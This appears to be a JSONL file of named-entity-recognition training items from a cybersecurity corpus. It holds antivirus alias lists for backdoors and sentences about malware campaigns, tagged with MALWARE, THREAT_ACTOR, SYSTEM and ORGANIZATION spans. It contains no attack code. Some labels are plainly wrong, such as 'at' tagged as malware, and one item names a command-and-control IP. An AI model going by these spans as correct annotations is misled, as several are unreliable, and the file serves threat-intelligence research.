{"text": "A backdoor also known as: Backdoor/W32.Optix.340187 Backdoor.Win32.Optix!O Trojan.Madtol.C Backdoor.Optix Packer.W32.NSAnti.kZ85 Backdoor/Optix.f W32/OptixPro.I Backdoor.OptixPro.13 Win32/OptixPro.F BKDR_OPTIXPRO.H Win.Trojan.Optix-5 Backdoor.Win32.Optix.b Trojan.Win32.Optix.bslhnb Backdoor.Win32.Optix_Pro.340203 Trojan.DownLoader.60627 BKDR_OPTIXPRO.H BehavesLike.Win32.Dropper.fc W32/OptixPro.WZQS-7361 Backdoor/Optix.Pro.bd BDS/Optix.Pro.13.7 Trojan[Backdoor]/Win32.Optix Backdoor:Win32/Optixpro.T Backdoor.Win32.Optix.b Trojan/Win32.Xema.C66170 Backdoor.Optix Bck/OptixPro.C Win32/Optix.Pro.13 Backdoor.Optix.Pro.BD Backdoor.Win32.Optix", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005573", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Hider!O W32/Backdoor.BVFG TROJ_HIDER.I Win.Trojan.Hider-4 Trojan.Win32.Hider.234496 Troj.W32.Hider.toFP Trojan.Hidn Trojan.Hider.Win32.266 TROJ_HIDER.I Trojan-Dropper.Delf Trojan/Win32.Hider.gh Win32.Troj.Hider.i.234496 Trojan.Win32.Hider.gh Trojan.Hider Win32/Trojan.0bc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005574", "source": "cyner2_train"}}
{"text": "Over the past few months, new strains of this infamous Android malware family have surfaced in third-party APK markets, as well as in the official Google Play store.", "spans": {"MALWARE: strains": [[30, 37]], "MALWARE: Android malware family": [[55, 77]], "SYSTEM: APK markets,": [[107, 119]], "SYSTEM: the official Google Play store.": [[134, 165]]}, "info": {"id": "cyner2_train_005576", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.VBKrypt.315392.AK Trojan.Win32.VBKrypt!O Trojan/Injector.wms Win32.Trojan.Inject.bh HV_VBKRYPT_CG092B3E.RDXN Trojan.Win32.VBKrypt.nrzc Trojan.Win32.VBKrypt.dzjqpk Trojan.MulDrop4.8756 Trojan.VBKrypt.Win32.180705 BehavesLike.Win32.BadFile.fh Trojan-PWS.Win32.Zbot Trojan.VBKrypt.amiu Trojan/Win32.VBKrypt Trojan.Symmi.D4542 Trojan.Win32.A.VBKrypt.315392.CI Trojan.Win32.VBKrypt.nrzc Worm:Win32/Secrar.A Trojan/Win32.Jorik.R37626 BScope.Worm.Gamarue.1191 W32/VBKrypt.MBW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005578", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Proxy/W32.Mitglieder.8304 Trojan/Proxy.Mitglieder.af TrojanProxy.Mitglied!TVlYB86T2l0 Trojan.Mitglieder.G Win32/Mitglieder.Z TSPY_TARNO.D Trojan.Win32.Mitglieder.dkdz TrojWare.Win32.TrojanProxy.Mitglieder.AF Trojan.Mitglieder.Win32.173 TSPY_TARNO.D BehavesLike.Win32.Downloader.xc W32/Mitglieder.M TrojanProxy.Mitglieder.h Win32.Troj.Mitglieder.af.kcloud TrojanProxy:Win32/Mitglieder.DK Win-Trojan/Mitglieder.8304 Trojan-Proxy.Win32.Mitglieder.e Trojan.Win32.Mitglieder.aTNT Win32/TrojanProxy.Mitglieder.AF Win32.Trojan-proxy.Mitglieder.Ectn Trojan-Proxy.Win32.Mitglieder.CL W32/Tarno.D!tr Proxy.4.AZ Win32/Trojan.63b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005579", "source": "cyner2_train"}}
{"text": "SilentPush investigates a recent Facebook phishing campaign targeting social media users on Facebook Messenger, but what do we know about the attack's tactics and what can we do about it?", "spans": {"ORGANIZATION: SilentPush": [[0, 10]], "THREAT_ACTOR: Facebook phishing campaign": [[33, 59]], "SYSTEM: social media": [[70, 82]], "SYSTEM: Facebook Messenger,": [[92, 111]]}, "info": {"id": "cyner2_train_005580", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB Trojan.Symmi.DFDA4 Win32.Trojan.WisdomEyes.16070401.9500.9858 Trojan.Win32.VB.ckrm Trojan.Win32.VB.edplzz Troj.W32.Vb!c Trojan:W32/Kilim.P Trojan.VB.Win32.164816 TR/Kecix.ztie Trojan/Win32.VB Trojan:Win32/Kecix.A Trojan.Win32.VB.ckrm Trojan.VB Trj/CI.A Win32.Trojan.Vb.Pdlo Trojan.VB!Qw/pqsBL6E0 Win32.Outbreak Win32/Trojan.b08", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005582", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Tool.PassView.Win32.702 Win.Trojan.Lmir-87 not-a-virus:PSWTool.Win32.PassView.vly Win32.Trojan.Psw.Szlj Application.Win32.PassView.1_51 BehavesLike.Win32.Dropper.mh not-a-virus:PSWTool.Win32.PassView W32/Application.YMHQ-2387 Backdoor/Prorat.fxr TR/PSW.Dumaru Trojan[PSWTool]/Win32.PassView Worm:Win32/Dumaru.H@mm Application.Heur.E5E9B8 not-a-virus:PSWTool.Win32.PassView.vly PassDump.b PUP.Optional.PassView Riskware.PSWTool!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005584", "source": "cyner2_train"}}
{"text": "While some criminals blow up ATMs to steal cash, others use less destructive methods, such as infecting the ATM with malware and then stealing the money.", "spans": {"THREAT_ACTOR: criminals": [[11, 20]], "SYSTEM: ATMs": [[29, 33]], "SYSTEM: ATM": [[108, 111]], "MALWARE: malware": [[117, 124]]}, "info": {"id": "cyner2_train_005585", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Pinfi.B Win32.Parite.B Virus/W32.Parite.C Virus.Win32.Parite.b!O W32.Perite.A W32/Pate.b W32/Pate.B Win32.Virus.Parite.d W32/Parite.B@mm W32.Pinfi.B Win32/Pinfi.A PE_PARITE.A Heuristics.W32.Parite.B Virus.Win32.Parite.b Win32.Parite.B Virus.Win32.Parite.bgvo W32.Parite.b!c Win32.Parite.B Win32.Parite.B Win32.Parite.2 Virus.Parite.Win32.9 PE_PARITE.A BehavesLike.Win32.Pate.gc Trojan.Win32.FakeAV W32/Parite.LAQX-0866 Win32/Parite.b Virus/Win32.Parite.c Win32.Parite.b.5756 TrojanDownloader:Win32/Grogsas.A Win32.Parite.B Win32.Parite.A Virus.Win32.Parite.b Win32.Parite.B Win32.Parite.B Virus.Win32.Parite.b Win32.Parite.B Win32/Parite.B Win32.Parite.B W32/Parite.B W32/Parite.B Virus.Win32.Parite.H", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005586", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Suslix.C Backdoor/W32.PlxT.20480 Backdoor.Suslix.C Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Backdoor.NXX Backdoor.Trojan Win32/Paltry.C Win.Trojan.Delf-473 Backdoor.Suslix.C Backdoor.Win32.PlxT.a Backdoor.Suslix.C Backdoor.Win32.Z.Suslix.20480 Backdoor.Suslix.C W32/Backdoor.PGXD-0378 Backdoor/PlxT.b Trojan[Backdoor]/Win32.Suslix Backdoor.Suslix.C Backdoor.Win32.PlxT.a Backdoor:Win32/Suslix.A Backdoor.Suslix.C Trj/CI.A Win32/Suslix.NAA Win32.Backdoor.Plxt.Ejez Trojan.Win32.Spy W32/Suslix.NAA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005588", "source": "cyner2_train"}}
{"text": "Cyber4Sight has analyzed the malware distributed via the compromised Polish Financial Supervision Authority webpage and used in targeted attacks against a number of large banks and telecommunication companies.", "spans": {"ORGANIZATION: Cyber4Sight": [[0, 11]], "MALWARE: malware": [[29, 36]], "ORGANIZATION: large banks": [[165, 176]], "ORGANIZATION: telecommunication companies.": [[181, 209]]}, "info": {"id": "cyner2_train_005589", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.38400.AY Trojan-Spy.Win32.Brospa!O Trojan.Witkinat Trojan/Spy.Brospa.cm TROJ_BROSPA.SMC Win32.Trojan.WisdomEyes.16070401.9500.9979 Backdoor.Trojan Win32/Witkinat.AY TROJ_BROSPA.SMC Win.Spyware.78717-2 Trojan.Win32.Brospa.bpglj Trojan.Win32.A.Brospa.38400.N Trojan.PWS.iThink.16 Trojan.Brospa.Win32.159 Trojan.Win32.Scar TrojanSpy.Brospa.o W32.Trojan.Witkinat.A Trojan[Spy]/Win32.Brospa Trojan:Win32/Witkinat.A Trojan/Win32.Brospa.R4351 TrojanSpy.Brospa Win32.Trojan-spy.Brospa.Wrqa W32/Witkinat.Q!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005590", "source": "cyner2_train"}}
{"text": "It appears to have evolved from the NewPOSthings family of malware first discovered by Dennis Schwarz and Dave Loftus at Arbor Networks.", "spans": {"MALWARE: NewPOSthings family of malware": [[36, 66]], "ORGANIZATION: Arbor Networks.": [[121, 136]]}, "info": {"id": "cyner2_train_005594", "source": "cyner2_train"}}
{"text": "This new variant, dubbed HummingWhale,' includes new, cutting edge techniques that allow it to perform ad fraud better than ever before.", "spans": {"MALWARE: HummingWhale,'": [[25, 39]]}, "info": {"id": "cyner2_train_005596", "source": "cyner2_train"}}
{"text": "SANS mail server quarantined this file FautraPago392023.gz and extracted the file to find there was no .exe extension associated with the file.", "spans": {"SYSTEM: SANS mail server": [[0, 16]]}, "info": {"id": "cyner2_train_005598", "source": "cyner2_train"}}
{"text": "When installed, GreenDispenser may display an out of service' message on the ATM -- but attackers who enter the correct pin codes can then drain the ATM's cash vault and erase GreenDispenser using a deep delete process, leaving little if any trace of how the ATM was robbed.", "spans": {"MALWARE: GreenDispenser": [[16, 30]], "ORGANIZATION: ATM": [[77, 80]], "THREAT_ACTOR: attackers": [[88, 97]], "SYSTEM: ATM's cash vault": [[149, 165]], "SYSTEM: ATM": [[259, 262]]}, "info": {"id": "cyner2_train_005599", "source": "cyner2_train"}}
{"text": "Interestingly , there is an allowlist of tapped activities : ui.ConversationActivity ui.ConversationListActivity SemcInCallScreen Quadrapop SocialPhonebookActivity The listener can operate with only coordinates , so it calculates pressed characters by matching given values with hardcoded ones : Additionally , if there is a predefined command , the keylogger can make a screenshot of the tapped display area : Manual access and operator menu There is a hidden menu ( Activity ) for controlling implant features that looks like it was created for manual operator control .", "spans": {}, "info": {"id": "cyner2_train_005600", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DeltreeY Trojan:BAT/DeltreeY.CA Trojan.BAT.DeltreeY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005601", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.Miner.CB Application.Miner.CB Linux/RubyMiner.A BAT_COINMINE.WIPX Application.Miner.CB Troj.Downloader.Shell!c Application.Miner.CB Linux.DownLoader.684 BAT_COINMINE.WIPX Trojan.RubyMiner Win32/Trojan.Downloader.72e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005602", "source": "cyner2_train"}}
{"text": "The malware is a reflection of how PoS threats, though no longer novel, are increasingly used against businesses and their customers.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: PoS threats,": [[35, 47]], "ORGANIZATION: businesses": [[102, 112]], "ORGANIZATION: customers.": [[123, 133]]}, "info": {"id": "cyner2_train_005603", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Skeeyah.19132 Win32.Trojan.WisdomEyes.16070401.9500.9934 not-a-virus:HEUR:Monitor.Win32.BeyondKeyLogger.heur System.Monitor.Relytec.All-in-o TR/Spy.arobe not-a-virus:HEUR:Monitor.Win32.BeyondKeyLogger.heur Trojan:Win32/Dhodareet.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005604", "source": "cyner2_train"}}
{"text": "Actors related to the Operation Lotus Blossom campaign continue their attack campaigns in the Asia Pacific region.", "spans": {"THREAT_ACTOR: Actors": [[0, 6]], "THREAT_ACTOR: the Operation": [[18, 31]], "THREAT_ACTOR: Lotus Blossom campaign": [[32, 54]], "THREAT_ACTOR: attack campaigns": [[70, 86]]}, "info": {"id": "cyner2_train_005605", "source": "cyner2_train"}}
{"text": "Based on the data we have acquired since October 2016, about 500 organizations from 50 countries were affected by the attack.", "spans": {"ORGANIZATION: organizations": [[65, 78]]}, "info": {"id": "cyner2_train_005607", "source": "cyner2_train"}}
{"text": "The AES key is generated using a SHA256 hash and due to the keys being stored on the infected machine, victims in many cases could likely decrypt files without paying the ransom.", "spans": {"SYSTEM: infected machine,": [[85, 102]]}, "info": {"id": "cyner2_train_005608", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod2e7.Trojan.3dab Backdoor/W32.Bifrose.737280.H Backdoor/Bifrose.chym BKDR_BIFROSE.DMQ W32/Trojan2.NEIM Backdoor.Trojan Win32/Tnega.UYbaRd BKDR_BIFROSE.DMQ Trojan.Win32.Bifrose.crakl Backdoor.W32.Bifrose.chym!c BackDoor.Bifrost.16023 Backdoor.Bifrose.Win32.49130 Backdoor.Bifrose W32/Trojan.TWKO-3939 BDS/Bifrose.chym W32/Bifrose.CHYM!tr.bdr Trojan[Backdoor]/Win32.Bifrose Backdoor/Win32.Bifrose.R127707 Backdoor.Bifrose Backdoor.Bifrose!bEtmoN1K0yI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005609", "source": "cyner2_train"}}
{"text": "The affected educational organizations, for instance, are used to deliver employment exams for government employees.", "spans": {"ORGANIZATION: educational organizations,": [[13, 39]], "ORGANIZATION: government employees.": [[95, 116]]}, "info": {"id": "cyner2_train_005610", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DusbyetorLTS.Trojan Trojan/W32.Kriskynote.442892.B Backdoor.Kriskynote.A4 Trojan/Rootkitdrv.w Trojan.Graftor.D35150 Win32.Trojan.WisdomEyes.16070401.9500.9510 W32/Trojan.HHCY-2846 Backdoor.Korplug.B Win32/Rootkitdrv.W BKDR_WINNT.SMD Trojan.Win32.Kriskynote.ay Trojan.Win32.Kriskynote.dkkllk Trojan.Win32.Z.Kriskynote.442892 BackDoor.Korplug.18 Trojan.Kriskynote.Win32.1 BKDR_WINNT.SMD Trojan.Win32.Kriskynote Trojan/Kriskynote.a Trojan/Win32.Kriskynote Trojan.Win32.Kriskynote.ay Trojan:Win64/Kriskynote.A!dha Win32/Tnega.aacQTM Trojan.Kriskynote Win32.Trojan.Kriskynote.Lkmz W32/Kriskynote.AY!tr Win32/Trojan.6da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005611", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Crypt.qk Win32.Trojan.WisdomEyes.16070401.9500.9532 TROJ_KRYPTIK.VTG Trojan.MSIL.Crypt.qk Trojan.Win32.Crypt.djsue BackDoor.Cybergate.1727 Trojan.Crypt.Win32.2613 TROJ_KRYPTIK.VTG Trojan.MSIL.Crypt Trojan/MSIL.bms TR/MSIL.Crypt.qk Trojan.MSIL.Krypt.2 Trojan.MSIL.Crypt.qk TrojanDownloader:Win32/Radet.A Msil.Trojan.Crypt.Swvd Trojan.Crypt!QtVXUF+C8/k Win32/Trojan.b12", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005613", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE W32.Virut.G Win32/Virut.17408 PE_VIRUX.J Win.Trojan.Clicker-3135 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.J BehavesLike.Win32.Virut.mm Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.ce.53248 TrojanClicker:Win32/Sadbick.A W32.Virut.l4o5 Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.06 Win32/Virut.NBP Worm.Win32.VBNA W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005614", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.9ED0 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.HLLM.Reset.493 BehavesLike.Win32.Ransomware.cc Backdoor.Poison Trojan.Midie.DA81B Backdoor/Win32.Poison.R217323 Trojan.Nymaim", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005615", "source": "cyner2_train"}}
{"text": "Mandiant, working in partnership with SonicWall Product Security and Incident Response Team PSIRT, has identified a suspected Chinese campaign that involves maintaining long term persistence by running malware on an unpatched SonicWall Secure Mobile Access SMA appliance.", "spans": {"ORGANIZATION: Mandiant,": [[0, 9]], "ORGANIZATION: SonicWall Product Security": [[38, 64]], "ORGANIZATION: Incident Response Team PSIRT,": [[69, 98]], "THREAT_ACTOR: a suspected Chinese campaign": [[114, 142]], "MALWARE: malware": [[202, 209]], "ORGANIZATION: SonicWall": [[226, 235]], "SYSTEM: Secure Mobile Access SMA": [[236, 260]]}, "info": {"id": "cyner2_train_005616", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Antivirus2008.DN MemScan:Trojan.Peed.JRX Trojan.Win32.Pakes.czg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005617", "source": "cyner2_train"}}
{"text": "This ransomware encrypts files and uses .braincrypt as file name extension for encrypted files.", "spans": {"MALWARE: ransomware": [[5, 15]]}, "info": {"id": "cyner2_train_005618", "source": "cyner2_train"}}
{"text": "The first example, a campaign observed on May 17, 2016, uses a fake Microsoft security alert social engineering lure to trick the victim into opening a link that leads to an executable download.", "spans": {"THREAT_ACTOR: campaign": [[21, 29]], "MALWARE: executable download.": [[174, 194]]}, "info": {"id": "cyner2_train_005619", "source": "cyner2_train"}}
{"text": "This blog details CNACOM, a web-based campaign that appears to be related to a well-known nation-state actor more commonly associated with spear-phishing attacks.", "spans": {"THREAT_ACTOR: CNACOM,": [[18, 25]], "THREAT_ACTOR: web-based campaign": [[28, 46]], "THREAT_ACTOR: nation-state actor": [[90, 108]]}, "info": {"id": "cyner2_train_005620", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dyloader Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.Injector TR/Dropper.gjdjj Trojan.Graftor.D4C89C W32/Injector.DHHK!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005621", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Demp.cxoswz TrojanDropper.Demp.aao Trojan[Dropper]/Win32.Injector", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005622", "source": "cyner2_train"}}
{"text": "The effects were broad reaching, with Ukraine Cyber police confirming over 2000 affected companies in Ukraine alone.", "spans": {"ORGANIZATION: Ukraine Cyber police": [[38, 58]], "ORGANIZATION: companies": [[89, 98]]}, "info": {"id": "cyner2_train_005623", "source": "cyner2_train"}}
{"text": "A backdoor also known as: RDN/Gaobot.worm!f Backdoor.Agobot.Win32.5073 Backdoor.W32.Agobot.svu!c Trojan.Heur.RP.EDFC38 Win32.Trojan.WisdomEyes.16070401.9500.9986 TROJ_ADAMOL.A Trojan.Win32.Agobot.dikwjo Win32.Backdoor.Agobot.Wlfl TROJ_ADAMOL.A BehavesLike.Win32.Downloader.gh Trojan.ATRAPS Backdoor/Agobot.bnd W32/AgoBot.SVU!tr.bdr Trojan[Backdoor]/Win32.Agobot Trojan:Win32/Adamol.A Trojan/Win32.Hupigon.C48593 Trj/Chgt.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005624", "source": "cyner2_train"}}
{"text": "On the heels of recent disclosures of ATM malware such as Suceful Plotus and Padpin aka Tyupkin, Proofpoint research has discovered yet another variant of ATM malware, which we have dubbed GreenDispenser.", "spans": {"MALWARE: ATM malware": [[38, 49]], "MALWARE: Suceful": [[58, 65]], "MALWARE: Plotus": [[66, 72]], "MALWARE: Padpin": [[77, 83]], "MALWARE: Tyupkin,": [[88, 96]], "ORGANIZATION: Proofpoint research": [[97, 116]], "MALWARE: variant of ATM malware,": [[144, 167]], "MALWARE: GreenDispenser.": [[189, 204]]}, "info": {"id": "cyner2_train_005625", "source": "cyner2_train"}}
{"text": "Initial reports of the attacks, published April 26 in Hebrew by the Israel National Cyber Event Readiness Team CERT-IL and The Marker, confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel.", "spans": {"MALWARE: attacks,": [[23, 31]], "ORGANIZATION: the Israel National Cyber Event Readiness Team CERT-IL": [[64, 118]], "ORGANIZATION: The Marker,": [[123, 134]], "ORGANIZATION: Ben-Gurion University": [[211, 232]]}, "info": {"id": "cyner2_train_005627", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Small Trojan.Win32.Small Trojan.Win32.Small.cva Trojan.Win32.Crypted.dxzuxb Troj.W32.Small!c Trojan.PWS.Banker1.19315 Trojan/Win32.Small Trojan.Win32.Small.cva Trojan.Win32.Small Trojan.Small Trj/CI.A Trojan.Win32.Clipbanker W32/ClipBanker.F!tr Win32/Trojan.65e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005628", "source": "cyner2_train"}}
{"text": "This is the summary of an analysis by an IT security researcher, which we publish in full.", "spans": {"ORGANIZATION: IT security researcher,": [[41, 64]]}, "info": {"id": "cyner2_train_005629", "source": "cyner2_train"}}
{"text": "Carbanak also known as Anunak are a group of financially motivated criminals first exposed in 2015.", "spans": {"THREAT_ACTOR: Carbanak": [[0, 8]], "THREAT_ACTOR: Anunak": [[23, 29]], "THREAT_ACTOR: group": [[36, 41]], "THREAT_ACTOR: criminals": [[67, 76]]}, "info": {"id": "cyner2_train_005631", "source": "cyner2_train"}}
{"text": "It spread via a recompiled version of the otherwise legitimate open source BitTorrent client application Transmission and distributed on their official website.", "spans": {"SYSTEM: open source BitTorrent client application": [[63, 104]]}, "info": {"id": "cyner2_train_005635", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.QQPass.757760.Q Trojan.Win32.Badur!O Risktool.Flystudio.16885 Trojan/AddUser.q TROJ_ADDUSER_EJ19018D.UVPM Win32/Tnega.CEGPWM TROJ_ADDUSER_EJ19018D.UVPM Trojan-Ransom.Win32.Snocry.yj Trojan.Win32.QQPass.cqivxp Backdoor.W32.Hupigon.lHRl Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R Trojan.DownLoader10.35182 Trojan.QQPass.Win32.21864 Exploit.Win32.MS Trojan/PSW.QQPass.qla TR/Strictor.38430 Trojan[PSW]/Win32.QQPass Trojan.Zusy.D2B925 Trojan-Ransom.Win32.Snocry.yj Trojan:Win32/Casus.A Trojan/Win32.QQPass.C217887 Trojan.Badur Win32/AddUser.Q Trojan.Win32.QQPass.i Trojan.PWS.QQPass!VhZvRiUJbao W32/QQPass.ELG!tr.pws Trojan.Win32.Extortioner.Q", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005636", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Unruy.C3 Downloader-BPA.d Trojan.Cosmu.Win32.1584 Trojan/Cosmu.fzo Win32.Trojan-Clicker.Cycler.a W32.Unruy.A Win32/Unruy.NaMNFGC HT_UNRUY_GF0601E8.UVPM Win.Trojan.Unruy-5876 Trojan.Win32.Drop.bcagho Troj.Spy.W32.BZub.l2bS TrojWare.Win32.TrojanSpy.BZub.~IP Trojan.MulDrop1.276 HT_UNRUY_GF0601E8.UVPM BehavesLike.Win32.Downloader.rt Trojan-Downloader.Win32.Unruy Trojan/Cosmu.bhh TR/Dldr.Unruy.C Worm/Win32.Unknown TrojanDownloader:Win32/Unruy.C Trojan.Unruy.1 Trojan/Win32.Cosmu.R39186 TrojanClicker.Cycler Trojan.CL.Cycler!gZ0c9KQr9Uk W32/ZAccess.Y!tr W32/OverDoom.B.worm Win32/Trojan.688", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005637", "source": "cyner2_train"}}
{"text": "Also seen in other Exploits Kits: - Neutrino - Nuclear - Magnitude - RIG - Hanjuan", "spans": {"MALWARE: Exploits Kits:": [[19, 33]], "MALWARE: Neutrino": [[36, 44]], "MALWARE: Nuclear": [[47, 54]], "MALWARE: Magnitude": [[57, 66]], "MALWARE: RIG": [[69, 72]], "MALWARE: Hanjuan": [[75, 82]]}, "info": {"id": "cyner2_train_005639", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PSW.Qwak.A Trojan-PWS/W32.Qwak.24576 PSWTool.Win32.Pqwak!O Trojan.Pqwak Trojan.Qwak.Win32.2 Trojan.PSW.Qwak.A W32/HackTool.AZN TROJ_PQWAK.A Trojan.PSW.Qwak.A not-a-virus:PSWTool.Win32.Pqwak.10 Trojan.PSW.Qwak.A Riskware.Win32.Pqwak.hqlb Trojan.Win32.Z.Qwak.24576 Trojan.PSW.Qwak.A TrojWare.Win32.PSW.Qwak.A Trojan.PWS.Qwak.10 TROJ_PQWAK.A Trojan.Win32.PSW W32/Tool.QTCZ-8948 TR/Pqwak.A Trojan[PSWTool]/Win32.Pqwak not-a-virus:PSWTool.Win32.Pqwak.10 Win-Trojan/Qwak.24576 Trojan.PSW.Qwak.A TrojanPSW.Qwak Trj/CI.A Win32/PSW.Qwak.A Win32.Trojan.Pqwak.Eeha Trojan.PSW.Qwak!llR4IBPnUH0 Win32/Trojan.006", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005640", "source": "cyner2_train"}}
{"text": "Stretching back to April 2016, she d befriended a lot of individuals, as many as 500, with similar interests.", "spans": {"ORGANIZATION: individuals,": [[57, 69]]}, "info": {"id": "cyner2_train_005644", "source": "cyner2_train"}}
{"text": "Based on received commands, it can either download malicious apps or switch the C C Twitter account to another one.", "spans": {"MALWARE: malicious apps": [[51, 65]]}, "info": {"id": "cyner2_train_005645", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDropper.Goominer Win32.Trojan.WisdomEyes.16070401.9500.9958 Trojan.Win32.Kazy.dbtlfz Trojan.Win32.Z.Kazy.939008.A Trojan.Kazy.D607AA TrojanDropper:Win32/Goominer.A Trj/GdSda.A Win32.Trojan.Kazy.Pciu Trojan.Win32.Comitsproc Win32/Trojan.013", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005647", "source": "cyner2_train"}}
{"text": "We dubbed this activity Operation Wilted Tulip", "spans": {"THREAT_ACTOR: Operation Wilted Tulip": [[24, 46]]}, "info": {"id": "cyner2_train_005648", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Swisyn!O Trojan.Starpage.A.mue Trojan/Swisyn.bhyk Win32.Trojan.Delf.it Trojan.Win32.Fsysna.djck Trojan.Win32.A.Swisyn.97827[UPX] Worm.Win32.Pronny.BL Trojan.PWS.Qqpass.6162 Trojan.Swisyn.Win32.21499 Trojan.Crypt Trojan/Win32.Swisyn HEUR/Fakon.mwf Worm.AutoRun Trojan.Win32.FakeFolder.pb Trojan.Swisyn!4rRLtK78L7s", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005649", "source": "cyner2_train"}}
{"text": "Some samples talk to compromised South Korean server at 203.250.148.63 and communicate in port 30000.", "spans": {"VULNERABILITY: compromised": [[21, 32]], "SYSTEM: server": [[46, 52]], "MALWARE: at": [[53, 55]]}, "info": {"id": "cyner2_train_005650", "source": "cyner2_train"}}
{"text": "The new GozNym hybrid takes the best of both the Nymaim and Gozi ISFB malware to create a powerful Trojan.", "spans": {"MALWARE: GozNym hybrid": [[8, 21]], "ORGANIZATION: best": [[32, 36]], "MALWARE: Nymaim": [[49, 55]], "MALWARE: Gozi ISFB malware": [[60, 77]], "MALWARE: powerful Trojan.": [[90, 106]]}, "info": {"id": "cyner2_train_005652", "source": "cyner2_train"}}
{"text": "The people behind the attacks are likely attempting to gain access to computers where banking transactions are performed, in order to steal banking credentials.", "spans": {"SYSTEM: computers": [[70, 79]]}, "info": {"id": "cyner2_train_005653", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9982 Trojan.Win64 Trojan[Backdoor]/Win32.Simda Trojan:Win64/Claretore.B W64/Simda.BD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005654", "source": "cyner2_train"}}
{"text": "One of them was of particular interest because we'd never seen the backdoor before and it leveraged a relatively unique German dynamic DNS provider for command and control.", "spans": {"MALWARE: backdoor": [[67, 75]]}, "info": {"id": "cyner2_train_005655", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.Htool.WKE Application.Htool.WKE W32/Risk.IUUB-2604 HKTL_DUMPSEC.TOMA Application.Htool.WKE Application.Htool.WKE Trojan.MulDrop3.34925 HKTL_DUMPSEC.TOMA W32/MalwareS.ITI Packed.Multi.rq HackTool:Win32/Dumpsec.A Application.Htool.WKE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005657", "source": "cyner2_train"}}
